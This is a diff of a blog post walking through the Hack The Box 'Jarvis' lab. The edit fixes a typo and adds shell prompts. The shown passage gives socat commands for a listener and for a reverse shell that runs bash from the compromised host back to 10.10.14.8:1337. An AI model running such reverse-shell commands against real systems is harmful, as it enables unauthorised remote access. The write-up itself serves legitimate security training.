samirettali/blog/content/writeups/hackthebox/jarvis.md

 And it does work!
 We have a shell as `www-data` user.

-We can get a better shell thant this one by running a `socat` listener on our machine with this command:
+We can get a better shell than this one by running a `socat` listener on our machine with this command:
 ```
-socat file:`tty`,raw,echo=0 tcp-listen:1337
+$ socat file:`tty`,raw,echo=0 tcp-listen:1337
 ```
 and connect to it with this command:
 ```
-socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.8:1337
+$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.8:1337
 ```

 ## Further enumeration